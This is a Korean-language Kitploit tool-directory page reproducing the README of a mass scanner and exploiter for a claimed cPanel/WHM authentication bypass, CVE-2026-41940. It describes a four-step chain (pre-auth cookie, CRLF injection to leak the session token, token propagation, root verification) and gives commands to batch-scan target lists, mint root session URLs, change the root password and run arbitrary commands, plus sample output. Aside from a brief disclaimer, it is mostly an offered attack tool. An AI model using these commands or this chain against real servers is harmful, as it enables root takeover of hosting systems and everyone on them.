Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - 대량 스캐너 & 익스플로이터 | Kitploit
도구/GitHubGitHub/lutfifakee-project/cve-2026-41940
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlAuthenticationRed TeamingPayload Development
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - 대량 스캐너 & 익스플로이터

23개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기웹사이트

CVE-2026-41940 - cPanel/WHM 인증 우회 스캐너 및 익스플로잇 도구

Python License Security Tested on

CVE-2026-41940용 cPanel/WHM 인증 우회 스캐너 및 익스플로잇 도구


⚠️ 면책 조항

이 도구는 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.

이 도구를 사용함으로써 다음 사항에 동의하게 됩니다:

  • 소유하고 있거나 명시적인 서면 승인을 받은 시스템만 테스트할 것입니다.
  • 컴퓨터 시스템에 대한 무단 접근은 불법임을 이해합니다.
  • 이 도구를 사용하는 동안 발생하는 모든 행동에 대한 책임은 전적으로 사용자에게 있습니다.
  • 이 도구를 재배포, 수정하거나 자신의 것이라고 주장할 수 없습니다.

❗ 작성자는 이 도구 사용으로 인해 발생하는 어떠한 오용, 불법 행위, 손해 또는 법적 결과에 대해서도 책임지지 않습니다.


🎯 개요

CVE-2026-41940은 유효한 자격 증명 없이 공격자가 무단으로 루트 수준 접근 권한을 획득할 수 있게 할 수 있는 cPanel/WHM의 치명적인 인증 우회 취약점입니다.

이 도구는 다음을 위한 Python 기반 구현을 제공합니다:

  • 취약한 대상 탐지
  • 익스플로잇 자동화(승인된 테스트용)
  • 대규모 스캔 수행

🔥 4단계 공격 체인


✨ 기능


📋 요구 사항

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 설치

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 사용법

기본 명령어

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 대상 파일 형식 (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ 매개변수


📊 예시 출력

일괄 스캔

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

세션 URL 생성

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ 취약점 세부 정보

필드값
CVECVE-2026-41940
심각도치명적 (CVSS 9.8)
공격 경로네트워크
요구 권한없음
사용자 상호작용없음

영향을 받는 버전

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ 중요 참고 사항

  • 승인된 시스템에서만 사용하세요
  • 세션 토큰은 빠르게 만료됩니다
  • 제한된 라이선스에서는 RCE가 실패할 수 있습니다
  • 일부 대상은 -hostname이 필요합니다
  • 모든 트래픽은 HTTPS를 사용합니다

🧪 테스트 환경

안전하고 합법적인 테스트를 위해:

  • 자체 VPS/서버를 사용하세요
  • 취약한 실습 환경을 구축하세요
  • 항상 서면 승인을 받으세요

⭐ 지원

이 프로젝트가 도움이 되었다면 ⭐을 눌러주세요.

도구 다운로드
단계설명
1. 사전 인증(Pre-authentication)/login/에 잘못된 자격 증명을 보내 whostmgrsession 쿠키를 획득
2. CRLF 주입Authorization: Basic 헤더를 통해 줄바꿈을 주입하여 cpsess 토큰을 유출
3. 토큰 전파do_token_denied를 트리거하여 토큰을 캐시로 전파
4. 검증/json-api/version에 접근하여 WHM 루트 접근을 확인
기능설명
🔄 일괄 스캔여러 대상을 동시에 스캔
🎯 단일 대상상세 출력과 함께 개별 대상 스캔
🔌 포트 스캔WHM 포트 자동 스캔 (2082, 2083, 2086, 2087)
🔓 세션 URL원클릭 WHM 로그인 URL 생성
💀 RCE루트 권한으로 시스템 명령 실행
🔑 비밀번호 변경WHM 루트 비밀번호 수정
📡 WHM API 호출WHM API 함수 호출
🎨 색상 출력결과의 시각적 출력
💾 결과 내보내기취약한 대상을 파일로 저장
매개변수설명예시
-u단일 대상 URL-u https://target.com:2087
-f대상 목록 파일-f targets.txt
-c동시성(스레드)-c 20
-o출력 파일-o results.txt
-hostname사용자 정의 Host 헤더-hostname cpanel.target.com
--scan-ports모든 WHM 포트 스캔--scan-ports
-session로그인 URL 생성-session
-passwd루트 비밀번호 변경-passwd "NewPass123"
-cmd명령 실행-cmd "id"
-keep임시 계정 유지-keep
-apiWHM API 호출-api listaccts
-api-paramsAPI 매개변수-api-params "user=root,password=123"